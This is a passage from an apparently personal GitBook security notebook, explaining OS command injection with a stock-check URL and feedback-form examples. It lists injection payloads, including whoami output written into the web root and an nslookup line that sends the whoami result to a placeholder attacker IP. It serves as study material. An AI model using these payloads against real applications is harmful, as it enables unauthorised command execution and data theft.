Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  • Executing arbitrary commands
  • An Attacker can,
  • Blind OS command injection
  • Blind OS Command Injection by redirecting output
  • Blind OS Command Injection using out-of-band technique
  1. WebApp Security

OS Command Injection

PRACTICE ! PRACTICE ! PRACTICE !

OS command injection is a security vuln which allows an attacker to exec os commands on the server that is running an application.

Executing arbitrary commands

https://website.com/stockStatus?productID=381&storeID=29

To provide the stock information, the application calls out the shell command with product and store ID's as arguments. stockreport.p1 381 29

This command outputs the stock status for the specified item, which is returned to the user.

An Attacker can,

& echo your &

If this is the modified input for the above url then it would look something like :

stockreport.p1 & echo hacked & 29

The echo command will simply echo the string and meanwhile the & is a bash separator.

Blind OS command injection

Modern days instances are actually blind OS injections, which does not return the output.

A web site that lets users submit feedback about the site. The user enters their email address and feedback message.

The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details.

`mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com`

The output of the mail command is not returned in the application response. To detect this BLIND OS vuln, we can

; ping -c 5 127.0.0.1

Blind OS Command Injection by redirecting output

We can redirect the os command's output into a file within the web-root and we can retrieve it through the browser.

; whoami > /var/www/static/whoami.txt ;

We can now retrieve it using :

https://website.com/whoami.txt

Submit Feedback Form : email=t||whoami > /var/www/images/whoami.txt||

Blind OS Command Injection using out-of-band technique

An injected command that will trigger an out-of-band network interaction with a system that you control.

; nslookup d0pt3x.gitbook.io ;

This payload uses the nslookup command to cause a DNS lookup for a specified domain.

||nslookup `whoami` <ATTACKER IP>||
PreviousHorizontal => VerticalNextSSTI

Last updated 2 years ago